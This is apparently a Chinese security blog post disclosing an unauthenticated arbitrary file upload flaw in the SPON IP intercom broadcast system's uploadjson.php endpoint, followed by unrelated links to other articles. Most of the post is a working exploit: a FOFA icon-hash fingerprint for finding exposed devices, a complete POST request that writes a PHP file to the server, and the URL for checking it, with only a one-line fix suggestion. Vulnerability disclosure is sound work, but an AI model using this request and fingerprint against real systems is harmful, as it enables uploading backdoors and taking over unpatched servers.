世邦IP网络对讲广播系统 uploadjson.php接口处存在任意文件上传漏洞

3tefanie丶zhou2024-01-11 17:44

产品简介

SPON世邦IP网络对讲广播系统是一种先进的通信解决方案,旨在提供高效的网络对讲和广播功能。

漏洞概述

SPON世邦IP网络对讲广播系统 uploadjson.php接口处存在任意文件上传漏洞,未经身份验证的攻击者可利用此漏洞上传恶意后门文件,可导致服务器失陷。

指纹识别

fofa:

python 复制代码 
icon_hash="-1830859634"

漏洞利用

poc

python 复制代码 
POST /php/uploadjson.php HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
 
jsondata[filename]=2.php&jsondata[data]=<?php echo md5('123456');?>

验证url:

python 复制代码 
http://your_ip/lan/2.php

修复建议

联系软件厂商更新至最新安全版本

相关推荐
望获linux1 小时前
【Linux基础知识系列】第一百一十篇 - 使用Nmap进行网络安全扫描
java·linux·开发语言·前端·数据库·信息可视化·php
哦你看看9 小时前
计算机网络技术(下)
网络·计算机网络
幽络源小助理9 小时前
如何从零开始学习黑客技术?网络安全入门指南
网络·学习·web安全
做一位快乐的码农9 小时前
php程序设计之基于PHP的手工艺品销售网站/基于php在线销售系统/基于php在线购物商城系统
开发语言·php
winkel_wang11 小时前
身份管理与安全 (Protect identities)
windows·安全
不懂机器人13 小时前
linux编程----网络通信(TCP)
linux·服务器·tcp/ip
司徒轩宇13 小时前
Python secrets模块:安全随机数生成的最佳实践
运维·python·安全
weixin_4569042713 小时前
C# .NET Framework 4.0 网络编程完全指南
网络·c#·.net
小白白13 小时前
局域网共享文件夹
网络
会飞的鱼_12313 小时前
CentOS 7服务器初始化全攻略:从基础配置到安全加固
服务器·安全·centos
热门推荐
01UV安装并设置国内源02KGG转MP3工具|非KGM文件|解密音频03不再让Windows更新!&Edge游戏助手卸载及关闭自动更新04【2025.08.06最新版】Android Studio下载、安装及配置记录(自动下载sdk)05Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code06Claude Code VSCode集成开发指南:AI编程助手完整配置07突破百度网盘的下载限速,两种方法教会你【超详细】08【踩坑笔记】50系显卡适配的 PyTorch 安装09Linux下V2Ray安装配置指南10jdk21下载、安装(Windows、Linux、macOS)